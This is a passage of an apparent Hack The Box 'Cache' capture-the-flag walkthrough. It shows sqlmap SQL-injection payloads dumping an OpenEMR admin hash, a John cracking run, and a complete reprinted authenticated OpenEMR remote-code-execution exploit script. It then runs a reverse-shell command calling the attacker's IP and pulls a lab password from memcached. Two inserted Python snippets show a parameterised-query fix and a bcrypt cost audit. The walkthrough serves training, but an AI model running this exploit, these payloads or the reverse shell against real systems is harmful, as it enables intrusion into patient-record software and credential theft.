[09:58:35] [INFO] retrieved: 'product_warehouse'
[09:58:36] [INFO] retrieved: 'registry'
[09:58:36] [INFO] retrieved: 'report_itemized'
[09:58:36] [INFO] retrieved: 'report_results'
[09:58:37] [INFO] retrieved: 'rule_action'
[09:58:37] [INFO] retrieved: 'rule_action_item'
[09:58:38] [INFO] retrieved: 'rule_filter'
[09:58:38] [INFO] retrieved: 'rule_patient_data'
[09:58:38] [INFO] retrieved: 'rule_reminder'
[09:58:39] [INFO] retrieved: 'rule_target'
[09:58:39] [INFO] retrieved: 'sequences'
[09:58:39] [INFO] retrieved: 'shared_attributes'
[09:58:40] [INFO] retrieved: 'standardized_tables_track'
[09:58:40] [INFO] retrieved: 'supported_external_dataloads'
[09:58:40] [INFO] retrieved: 'syndromic_surveillance'
[09:58:41] [INFO] retrieved: 'template_users'
[09:58:41] [INFO] retrieved: 'therapy_groups'
[09:58:41] [INFO] retrieved: 'therapy_groups_counselors'
[09:58:42] [INFO] retrieved: 'therapy_groups_participant_attendance'
[09:58:42] [INFO] retrieved: 'therapy_groups_participants'
[09:58:42] [INFO] retrieved: 'transactions'
[09:58:43] [INFO] retrieved: 'user_settings'
[09:58:43] [INFO] retrieved: 'users'
[09:58:43] [INFO] retrieved: 'users_facility'
[09:58:44] [INFO] retrieved: 'users_secure'
[09:58:44] [INFO] retrieved: 'valueset'
[09:58:45] [INFO] retrieved: 'version'
[09:58:45] [INFO] retrieved: 'voids'
[09:58:45] [INFO] retrieved: 'x12_partners'
Database: openemr
[234 tables]
+---------------------------------------+
| array |
| groups |
| log |
| version |
| addresses |
| amc_misc_data |
| amendments |
| amendments_history |
| ar_activity |
| ar_session |
| audit_details |
| audit_master |
| automatic_notification |
| background_services |
| batchcom |
| billing |
| calendar_external |
| categories |
| categories_seq |
| categories_to_documents |
| ccda |
| ccda_components |
| ccda_field_mapping |
| ccda_sections |
| ccda_table_mapping |
| chart_tracker |
| claims |
| clinical_plans |
| clinical_plans_rules |
| clinical_rules |
| clinical_rules_log |
| code_types |
| codes |
| codes_history |
| config |
| config_seq |
| customlists |
| dated_reminders |
| dated_reminders_link |
| direct_message_log |
| documents |
| documents_legal_categories |
| documents_legal_detail |
| documents_legal_master |
| drug_inventory |
| drug_sales |
| drug_templates |
| drugs |
| eligibility_response |
| eligibility_verification |
| employer_data |
| enc_category_map |
| erx_drug_paid |
| erx_narcotics |
| erx_rx_log |
| erx_ttl_touch |
| esign_signatures |
| extended_log |
| external_encounters |
| external_procedures |
| facility |
| facility_user_ids |
| fee_sheet_options |
| form_care_plan |
| form_clinical_instructions |
| form_dictation |
| form_encounter |
| form_eye_mag |
| form_eye_mag_dispense |
| form_eye_mag_impplan |
| form_eye_mag_orders |
| form_eye_mag_prefs |
| form_eye_mag_wearing |
| form_functional_cognitive_status |
| form_group_attendance |
| form_groups_encounter |
| form_misc_billing_options |
| form_observation |
| form_reviewofs |
| form_ros |
| form_soap |
| form_taskman |
| form_vitals |
| forms |
| gacl_acl |
| gacl_acl_sections |
| gacl_acl_seq |
| gacl_aco |
| gacl_aco_map |
| gacl_aco_sections |
| gacl_aco_sections_seq |
| gacl_aco_seq |
| gacl_aro |
| gacl_aro_groups |
| gacl_aro_groups_id_seq |
| gacl_aro_groups_map |
| gacl_aro_map |
| gacl_aro_sections |
| gacl_aro_sections_seq |
| gacl_aro_seq |
| gacl_axo |
| gacl_axo_groups |
| gacl_axo_groups_map |
| gacl_axo_map |
| gacl_axo_sections |
| gacl_groups_aro_map |
| gacl_groups_axo_map |
| gacl_phpgacl |
| geo_country_reference |
| geo_zone_reference |
| globals |
| gprelations |
| history_data |
| icd10_dx_order_code |
| icd10_gem_dx_10_9 |
| icd10_gem_dx_9_10 |
| icd10_gem_pcs_10_9 |
| icd10_gem_pcs_9_10 |
| icd10_pcs_order_code |
| icd10_reimbr_dx_9_10 |
| icd10_reimbr_pcs_9_10 |
| icd9_dx_code |
| icd9_dx_long_code |
| icd9_sg_code |
| icd9_sg_long_code |
| immunization_observation |
| immunizations |
| insurance_companies |
| insurance_data |
| insurance_numbers |
| issue_encounter |
| issue_types |
| lang_constants |
| lang_custom |
| lang_definitions |
| lang_languages |
| layout_group_properties |
| layout_options |
| lbf_data |
| lbt_data |
| list_options |
| lists |
| lists_touch |
| log_comment_encrypt |
| log_validator |
| medex_icons |
| medex_outgoing |
| medex_prefs |
| medex_recalls |
| misc_address_book |
| module_acl_group_settings |
| module_acl_sections |
| module_acl_user_settings |
| module_configuration |
| modules |
| modules_hooks_settings |
| modules_settings |
| multiple_db |
| notes |
| notification_log |
| notification_settings |
| onotes |
| onsite_documents |
| onsite_mail |
| onsite_messages |
| onsite_online |
| onsite_portal_activity |
| onsite_signatures |
| openemr_module_vars |
| openemr_modules |
| openemr_postcalendar_categories |
| openemr_postcalendar_events |
| openemr_postcalendar_limits |
| openemr_postcalendar_topics |
| openemr_session_info |
| patient_access_offsite |
| patient_access_onsite |
| patient_birthday_alert |
| patient_data |
| patient_portal_menu |
| patient_reminders |
| patient_tracker |
| patient_tracker_element |
| payment_gateway_details |
| payments |
| pharmacies |
| phone_numbers |
| pma_bookmark |
| pma_column_info |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pnotes |
| prescriptions |
| prices |
| procedure_answers |
| procedure_order |
| procedure_order_code |
| procedure_providers |
| procedure_questions |
| procedure_report |
| procedure_result |
| procedure_type |
| product_registration |
| product_warehouse |
| registry |
| report_itemized |
| report_results |
| rule_action |
| rule_action_item |
| rule_filter |
| rule_patient_data |
| rule_reminder |
| rule_target |
| sequences |
| shared_attributes |
| standardized_tables_track |
| supported_external_dataloads |
| syndromic_surveillance |
| template_users |
| therapy_groups |
| therapy_groups_counselors |
| therapy_groups_participant_attendance |
| therapy_groups_participants |
| transactions |
| user_settings |
| users |
| users_facility |
| users_secure |
| valueset |
| voids |
| x12_partners |
+---------------------------------------+

[09:58:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 09:58:45 /2020-10-01/

root@JIYE:~/htb/cache#

3. Dump the columns of the users_secure table

root@JIYE:~/htb/cache# sqlmap -r bp -D openemr -T users_secure --columns --batch
___
__H__
___ ___[(]_____ ___ ___ {1.4.9#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:37:10 /2020-10-01/

[10:37:10] [INFO] parsing HTTP request from 'bp'
[10:37:11] [INFO] resuming back-end DBMS 'mysql'
[10:37:11] [INFO] testing connection to the target URL
[10:37:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[10:37:11] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:37:11] [INFO] fetching columns for table 'users_secure' in database 'openemr'
[10:37:12] [INFO] retrieved: 'id','bigint(20)'
[10:37:12] [INFO] retrieved: 'username','varchar(255)'
[10:37:13] [INFO] retrieved: 'password','varchar(255)'
[10:37:13] [INFO] retrieved: 'salt','varchar(255)'
[10:37:14] [INFO] retrieved: 'last_update','timestamp'
[10:37:14] [INFO] retrieved: 'password_history1','varchar(255)'
[10:37:14] [INFO] retrieved: 'salt_history1','varchar(255)'
[10:37:15] [INFO] retrieved: 'password_history2','varchar(255)'
[10:37:15] [INFO] retrieved: 'salt_history2','varchar(255)'
Database: openemr
Table: users_secure
[9 columns]
+-------------------+--------------+
| Column | Type |
+-------------------+--------------+
| id | bigint(20) |
| last_update | timestamp |
| password | varchar(255) |
| password_history1 | varchar(255) |
| password_history2 | varchar(255) |
| salt | varchar(255) |
| salt_history1 | varchar(255) |
| salt_history2 | varchar(255) |
| username | varchar(255) |
+-------------------+--------------+

[10:37:15] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 10:37:15 /2020-10-01/

4. Dump the data

root@JIYE:~/htb/cache# sqlmap -r bp -D openemr -T users_secure -C username,password --dump
___
__H__
___ ___[(]_____ ___ ___ {1.4.9#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:47:00 /2020-10-01/

[10:47:00] [INFO] parsing HTTP request from 'bp'
[10:47:00] [INFO] resuming back-end DBMS 'mysql'
[10:47:00] [INFO] testing connection to the target URL
[10:47:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[10:47:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[10:47:01] [INFO] fetching entries of column(s) 'password, username' for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[1 entry]
+---------------+--------------------------------------------------------------+
| username | password |
+---------------+--------------------------------------------------------------+
| openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. |
+---------------+--------------------------------------------------------------+

[10:47:01] [INFO] table 'openemr.users_secure' dumped to CSV file '/root/.local/share/sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[10:47:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 10:47:01 /2020-10-01/

root@JIYE:~/htb/cache#
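What sqlmap is exploiting above is a request parameter (eid) spliced straight into SQL text; the UNION payload it chose simply appends a second SELECT that returns the users_secure columns in place of event data. The following is an added illustration, not code from this post or from OpenEMR: it shows that pattern beside its fix in Python against an in-memory SQLite stand-in. Only users_secure and its username/password columns come from the dump; the events table, its four columns and the rows are assumptions for this example, and the UNION payload mirrors the four-column shape sqlmap reported (SQLite uses || where MySQL uses CONCAT()).

```python
import sqlite3

# Constructed in-memory stand-in for the OpenEMR database. Only the table
# users_secure and its username/password columns come from the dump above; the
# events table, its columns and every row are assumptions made for this example.
SCHEMA = """
CREATE TABLE events (eid INTEGER, title TEXT, note TEXT, owner TEXT);
CREATE TABLE users_secure (id INTEGER, username TEXT, password TEXT, salt TEXT);
INSERT INTO events VALUES (1, 'checkup', 'routine visit', 'ash');
INSERT INTO users_secure VALUES (1, 'openemr_admin', '$2a$05$placeholder.not.a.real.hash', 'x');
"""

# Same shape as sqlmap's UNION payload above: four columns, with the third one
# carrying the data it wants back. Constructed for this example.
UNION_PAYLOAD = ("1 UNION ALL SELECT NULL,NULL,username||':'||password,NULL "
                 "FROM users_secure-- -")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_event_vulnerable(conn, eid):
    """The bug: the request parameter is pasted into the SQL text, so a value
    like UNION_PAYLOAD changes the statement instead of just its input."""
    sql = "SELECT eid, title, note, owner FROM events WHERE eid=" + eid
    return conn.execute(sql).fetchall()


def lookup_event_safe(conn, eid):
    """The fix: validate the type you expect, then bind it as a parameter so the
    driver sends it as data and it can never alter the statement."""
    try:
        eid_value = int(eid)
    except (TypeError, ValueError):
        return []  # reject malformed input rather than try to sanitise it
    sql = "SELECT eid, title, note, owner FROM events WHERE eid=?"
    return conn.execute(sql, (eid_value,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", lookup_event_vulnerable(db, UNION_PAYLOAD))
    print("safe:      ", lookup_event_safe(db, UNION_PAYLOAD))
```

Run stand-alone, the vulnerable lookup returns the legitimate event row followed by a second row whose third column is the admin username and hash; the parameterised lookup returns nothing for the same input and the single event row for a plain "1".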

0x09. Cracking the hash

It cracks to xxxxxx

root@JIYE:~/htb/cache# cat hash 
$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
root@JIYE:~/htb/cache# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-10-01 10:58) 5.555g/s 4800p/s 4800c/s 4800C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@JIYE:~/htb/cache#
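The sub-second crack above is not only rockyou's doing. John reports "Cost 1 (iteration count) is 32", which is bcrypt cost 05, i.e. 2^5 rounds, far below the 10 to 12 normally used, so each guess is cheap. As an added example (not code from this post or from OpenEMR), the following Python parses the dumped hash in modular-crypt format, reads out the cost, and flags any hash below a policy floor; MIN_COST and the second, placeholder hash are assumptions made for the example.

```python
import re

# Modular-crypt-format bcrypt: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# Hash from the dump above; cost 05 is what John reported as 32 iterations.
DUMPED_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

# Constructed placeholder with a sane cost (not the hash of anything real).
STRONG_PLACEHOLDER = ("$2b$12$" + "abcdefghijklmnopqrstuv"
                      + "ABCDEFGHIJKLMNOPQRSTUVWXYZ01234")

MIN_COST = 10  # assumption: the policy floor this example enforces


def parse_bcrypt(hash_str):
    """Split a bcrypt string into its fields; raises ValueError if malformed."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {"variant": variant, "cost": cost,
            "iterations": 2 ** cost, "salt": salt, "digest": digest}


def audit_hashes(rows, min_cost=MIN_COST):
    """rows: iterable of (username, hash). Returns a list of
    (username, cost or None, reason) for every hash that needs attention."""
    weak = []
    for user, h in rows:
        try:
            info = parse_bcrypt(h)
        except ValueError:
            weak.append((user, None, "not a bcrypt hash"))
            continue
        if info["cost"] < min_cost:
            weak.append((user, info["cost"],
                         "cost %d (2^%d = %d rounds) is below the floor of %d"
                         % (info["cost"], info["cost"],
                            info["iterations"], min_cost)))
    return weak


if __name__ == "__main__":
    for finding in audit_hashes([("openemr_admin", DUMPED_HASH),
                                 ("placeholder_user", STRONG_PLACEHOLDER)]):
        print(finding)
```

Running the audit over the dumped row reports openemr_admin at cost 5 (32 rounds); the placeholder at cost 12 passes. Rehashing on next login whenever the stored cost is below the floor is the usual way to raise it without a forced reset.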

0x10. Googling for an exploit

OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution (exploit link)

#!/usr/bin/env python

import argparse
import base64
import requests
import sys

ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()

ascii = "> .---. ,---. ,---. .-. .-.,---. ,---. <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\ <\r\n"
ascii+= ">| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/ <\r\n"
ascii+= ">| | | | | |--' | .-' | |\ || .-' (_)\/ || ( <\r\n"
ascii+= ">\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \ <\r\n"
ascii+= "> )---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\ <\r\n"
ascii+= ">(_) (__) (__) (__) (__) '-' '-' (__) <\r\n"
ascii+= " \r\n"
ascii+= " ={> P R O J E C T I N S E C U R I T Y <}= \r\n"
ascii+= " \r\n"
ascii+= " Twitter : >@Insecurity< \r\n"
ascii+= " Site : >insecurity.sh< \r\n"

green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"

load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)

print(intro)

with requests.session() as s:
    login = {"new_login_session_management": "1",
             "authProvider": "Default",
             "authUser": args.user,
             "clearPass": args.password,
             "languageChoice": "1"
             }

    print(load + "Authenticating with " + args.user + ":" + args.password)
    r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
    if "login_screen.php?error=1&site=" in r.text:
        print(err + "Failed to Login.")
        sys.exit(0)

    # This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
    payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
    payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
    payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
    payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
    payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
    payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
    payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
    payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
    payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
    payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
    payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
    payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
    payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
    payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
    payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
    payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
    payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
    payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
    payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
    payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
    payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
    payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
    payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
    payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
    payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
    payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
    payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
    payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
    payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
    payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
    payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
    payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
    payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
    payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
    payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
    payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
    payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
    payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
    payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
    payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
    payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
    payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
    payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
    payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
    payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
    payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
    payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
    payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
    payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
    payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
    payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
    payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
    payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
    payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
    payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
    payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
    payload += "form_364=14&form_365=65&form_366=220"

    p = {}
    for c in payload.replace("&", "\n").splitlines():
        a = c.split("=")
        p.update({a[0]: a[1]})

    # Linux only, but can be easily modified for Windows.
    _cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
    p.update({"form_284": _cmd})

    print(load + "Injecting payload")
    s.post(args.host + "/interface/super/edit_globals.php", data=p)
    sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
    if sp.status_code == 200:
        print(load + "Payload executed")

0x11.exploit

1. First install the argparse dependency (argparse link)

tar -xzvf argparse-1.4.0.tar.gz
cd argparse-1.4.0
python setup.py install
easy_install argparse
pip install argparse

2. Start a listener on Kali

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ..

3. Run the exploit

root@JIYE:~/htb/cache# python2 exp.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.17.216/6666 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)

={ P R O J E C T I N S E C U R I T Y }=

Twitter : @Insecurity
Site : insecurity.sh

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload


4. Reverse shell

root@JIYE:~# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.17.216] from (UNKNOWN) [10.10.10.188] 37914
bash: cannot set terminal process group (1684): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$

www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
whoami
www-data
www-data@cache:/var/www/hms.htb/public_html/interface/main$

5. Upgrade the shell

www-data@cache:/var/www/hms.htb/public_html/interface/main$ python3 -c "import pty;pty.spawn('/bin/bash')"
<ain$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@cache:/var/www/hms.htb/public_html/interface/main$

www-data@cache:/var/www/hms.htb/public_html/interface/main$ ^Z
[1]+ 已停止 nc -nvlp 6666
root@JIYE:~# stty raw -echo
root@JIYE:~# nc -nvlp 6666

www-data@cache:/var/www/hms.htb/public_html/interface/main$
www-data@cache:/var/www/hms.htb/public_html/interface/main$
www-data@cache:/var/www/hms.htb/public_html/interface/main$ whoami
www-data
www-data@cache:/var/www/hms.htb/public_html/interface/main$

6. Upgrade to a fully interactive shell

bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
<e/main$ [1]+ 已停止 nc -nvlp 6666 n$
[1]+: command not found
<ic_html/interface/main$ root@JIYE:~# stty raw -echo
root@JIYE:~#: command not found
<lic_html/interface/main$ root@JIYE:~# nc -nvlp 6666
root@JIYE:~#: command not found
www-data@cache:/var/www/hms.htb/public_html/interface/main$
<cache:/var/www/hms.htb/public_html/interface/main$
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
<cache:/var/www/hms.htb/public_html/interface/main$
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
</var/www/hms.htb/public_html/interface/main$ whoami
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
www-data@cache:/var/www/hms.htb/public_html/interface/main$ www-data
www-data: command not found
<@cache:/var/www/hms.htb/public_html/interface/main$
bash: www-data@cache:/var/www/hms.htb/public_html/interface/main$: No such file or directory
www-data@cache:/var/www/hms.htb/public_html/interface/main$
www-data@cache:/var/www/hms.htb/public_html/interface/main$
www-data@cache:/var/www/hms.htb/public_html/interface/main$
www-data@cache:/var/www/hms.htb/public_html/interface/main$

7. Switch to user ash and get the flag

www-data@cache:/home$ cd ash
www-data@cache:/home/ash$ ls
Desktop Documents Downloads Music Pictures Public user.txt
www-data@cache:/home/ash$ cat user.txt
cat: user.txt: Permission denied
www-data@cache:/home/ash$ su ash
Password:
ash@cache:~$ whoami
ash
ash@cache:~$ pwd
/home/ash
ash@cache:~$ ls
Desktop Documents Downloads Music Pictures Public user.txt
ash@cache:~$ cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
ash@cache:~$

0x12. Privilege escalation

1. Check the listening ports

A Google search shows that port 11211 is the memcached service

ash@cache:/$ ss -lnt
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:11211 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
ash@cache:/$

2. memcached (reference)

This yields the user luffy with the password 0n3_p1ec3

ash@cache:/$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats
STAT pid 987
STAT uptime 1807
STAT time 1601548108
STAT version 1.5.6 Ubuntu
STAT libevent 2.1.8-stable
STAT pointer_size 64
STAT rusage_user 0.153965
STAT rusage_system 0.193444
STAT max_connections 1024
STAT curr_connections 1
STAT total_connections 32
STAT rejected_connections 0
STAT connection_structures 2
STAT reserved_fds 20
STAT cmd_get 0
STAT cmd_set 150
STAT cmd_flush 0
STAT cmd_touch 0
STAT get_hits 0
STAT get_misses 0
STAT get_expired 0
STAT get_flushed 0
STAT delete_misses 0
STAT delete_hits 0
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 0
STAT cas_hits 0
STAT cas_badval 0
STAT touch_hits 0
